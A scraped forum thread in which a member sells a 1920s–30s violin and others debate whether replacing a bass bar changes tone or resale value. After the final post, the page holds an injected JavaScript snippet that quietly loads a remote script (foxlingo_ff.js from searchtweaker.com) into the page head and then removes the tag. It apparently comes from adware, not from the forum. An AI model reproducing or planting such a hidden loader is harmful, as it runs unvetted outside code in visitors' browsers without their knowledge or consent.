Welcome, Guest. Please login or register.
Did you miss your activation email?

Forum Shops

Affiliates

If you've forgotten your password or username, email madfiddler (link on the left of page).

Author Topic: violin from 1920-30 for sale  (Read 3753 times)

Offline midiviolin

• Total Badges: 32
    Badges: (View All)
    Tenth year Anniversary Level 6 Nineth year Anniversary
violin from 1920-30 for sale
« on: Dec 12, 2012, 09:04:58 PM »
I'm selling some of my acustic violins (soon I think to sell also my Zeta Strados midi 4 strings) so here is the first one:
Violin 1920-30 without label

http://www.ebay.it/itm/230895733108?ssPageName=STRK:MESELX:IT&_trksid=p3984.m1555.l2649

« Last Edit: Dec 13, 2012, 12:02:35 AM by midiviolin »

Offline Jansberg

• www.jansberg.com

Linux User Level 6 Tenth year Anniversary
Re: violin from 1920-30 for sale
« Reply #1 on: Dec 13, 2012, 07:59:35 AM »
why the new bassbar? any soundclips?
www.jansberg.blogspot.com - my blog about pickups, microphones, amplifiers and other gear for fiddles

Offline midiviolin

« Reply #2 on: Dec 13, 2012, 05:57:13 PM »
Hi Jansberg,
A friend of mine, with whom I bought this violin 9 years ago, thought that by changing the bassbar (so he took off the original and unfortunately also the label which was inside) it will sell better, without even trying how the violin sounds... we bought it without strings and bridge.
 In the end what happened is that I was left with the violin which was open for few years and was put together only about two years ago.
I will put some sound samples asap, Maybe even tomorrow otherwise, next week. (got a new soundcard now!)
Is it easy to upload here in the forum?
« Last Edit: Dec 13, 2012, 06:08:49 PM by midiviolin »

Offline polkat

• Total Badges: 22
    Tenth year Anniversary Level 5 Super Combination
« Reply #3 on: Dec 13, 2012, 09:54:15 PM »
Changing the bassbar and removing the label will not make it sell better! Usually doing any unnecessary modifications to a violin will limit it's value. 

Offline midiviolin

« Reply #4 on: Dec 13, 2012, 11:04:02 PM »
Hi Polkat,
that was not of my decision and I wouldn't make it.
Some people change the bassbar because they think the violin will have a stronger sound. I was very upset actually with that friend because he took off the label and obliged me later to be forced to have a new bassbar which meant waste of time and money for me.

I agree with you that unnecessary modifications can limit the value but not in this case, and definitely not when we speak about this level of violins. In case of a violin of an author yes because you would like to have as much original parts as possible. A shame only that there is not anymore the label inside (maybe he used it for another violin of his, who knows).

Many makers change bassbars inside violins for having better sound (according to them or in reality). They just don't mention it when they sell the instrument to the musician...

Offline polkat

• Total Badges: 22
    Tenth year Anniversary Level 5 Super Combination
« Reply #5 on: Jan 12, 2013, 11:36:03 PM »
Well, I am a maker, and a repairer, and few other makers I know would agree with what you just said. A loose or cracked bar? Glue it in! That's a legitimate fix. But a change in tone from changing a bar? Sure, but probably not for the better. There is an old belief (that I don't agree with) that bars "get tired" and flatten out, but unless the whole top plate has warped or flattened out, that's not likely true either. And changing a good bar just to effect tone...wow, should have little or no effect. If you tell smart perspective buyer about it, then it will limit the value regardless of it's 'level', and if you don't...well.....shame on you.

Got any pics of this instrument?

Offline midiviolin

« Reply #6 on: Jan 13, 2013, 01:38:31 AM »
changing a good bar just to effect tone...wow, should have little or no effect. If you tell smart perspective buyer about it, then it will limit the value regardless of it's 'level', and if you don't...well.....shame on you.

Got any pics of this instrument?

Yes Polkat, it's on Ebay now,  here is the new link: http://www.ebay.com/itm/230911740194?ssPageName=STRK:MESELX:IT&_trksid=p3984.m1555.l2649

Good or bad for business, I mentioned the new bassbar because I'm a honest man.
As I said: it wasn't me who took the original off or put a new one.   I don't get though how this would limit the value?

True that normally,  a new bassbar would be put together with changing the thickness of the belly BUT sometimes German violins have very funny bassbars (look a bit like the snake from "The little prince"' after he ate the sheep - http://themetapicture.com/if-you-know-what-this-is-you-are-awesome-and-you-know-it/) and can be a part of the belly itself, and they are changed.
It is not this case, but just for the record: many makers change bassbars of new Chinese violins (for ex.) and later sell them for 3000$ and more, but they will never mention it to any of their custumer... Musicians don't have a clue about how some things are made in the luthier world but I will not open here Pandora's box ;)

p.s. Didn't have much time to record, I should put some sound samples as Jansberg suggested, hope in the next days.
« Last Edit: Jan 13, 2013, 02:19:33 AM by midiviolin »

Offline Jansberg

• www.jansberg.com

Linux User Level 6 Tenth year Anniversary
« Reply #7 on: Jan 13, 2013, 12:14:25 PM »
it looks a lot like the violin I am playing at the moment and I am looking forward to sound samples - price on ebay seems a little steep though..
www.jansberg.blogspot.com - my blog about pickups, microphones, amplifiers and other gear for fiddles

Offline Illinoisfiddler

• Total Badges: 28
    500 Posts Tenth year Anniversary Linux User
« Reply #8 on: Jan 14, 2013, 10:02:40 AM »
Nice looking violin, although it does have a lot of scratches on the top around the bridge. Perhaps this is normal for a fiddle of that age? I would also like to see a Hill tuner for the E string rather than one that changes the after length on a violin of this price.

Offline violinman

• West Country Violins

• Total Badges: 24
    Nineth year Anniversary Topic Starter Level 5
« Reply #9 on: Feb 18, 2014, 11:20:05 AM »
Interesting stuff about bass bars, I also think they they do not get tired with age, but they do come adrift. I know this because I work with violins made between 1800 and 1945 and have re-glued the bass bar in many violins over the years, they were always good enough to put back, it was the glue that was tired!
http://www.westcountryviolins.com
Beautiful old violins and bows at trade prices!

Offline Joe Gerardi

• Global Moderator
  • Someone with 5 blobs
  • I *bothered* to edit my profile... :-)

Apple User Level 6 Tenth year Anniversary
« Reply #10 on: Feb 18, 2014, 12:23:05 PM »
All y'all realize that this ad was from 2012, right?

..Joe
"Some people are like a Slinky... not really good for anything, but you still can't help but smile when you shove them down the stairs"

Offline midiviolin

« Reply #11 on: Feb 24, 2014, 06:06:52 PM »
Yes it is true Joe but the discussion about bassbar will be true on other violins too ;)
Violinman, in some cases is better to make a new bassbar instead of gluing it, depends on many factors as, for ex, condition, length and shape, if there was any restoration on the table or simply if the restaurateur thinks that with a new bassbar the violin will sounds better. I do agree that it is always better to leave the original if possible.

I still do have few violins to sell so if anyone is interested please pm me :)
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Get Adobe Flash player

Fiddle and Alternative Strings Forum (c) 2016 Mark Knight /
SONiC FUEL
SimplePortal 2.3.7 © 2008-2020, SimplePortal